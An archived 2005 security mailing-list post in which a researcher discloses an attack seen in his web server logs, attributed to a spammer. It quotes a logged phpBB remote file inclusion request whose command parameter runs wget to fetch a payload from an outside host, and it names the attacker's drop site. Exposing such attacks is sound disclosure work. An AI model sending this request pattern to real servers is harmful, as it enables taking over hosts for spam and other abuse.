lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.63.0507281920190.13511@secpro.servermatrix.com> Date: Fri Jul 29 03:21:00 2005 From: tommy at security-protocols.com (Tom Ferris) Subject: Microsoft MSN MESSENGER PATCH PLUS. Download exclusivo para usurios registrados. Just wanted to expose this spammers site. I noticed the following in my web logs: 200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET /admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t /dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.8) Gecko/20050511 Firefox/1.0.4" It is apparent from the logs above and research I have done that he is trying to exploit a phpBB vuln in order to compromise hosts and use them as spam relays. spammers drop site: http://www.binaryshadow.org/~w00t/ mirror: http://www.security-protocols.com/binaryshadow-mirror/ Thanks, Tom Ferris Researcher www.security-protocols.com Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78
Powered by blists - more mailing lists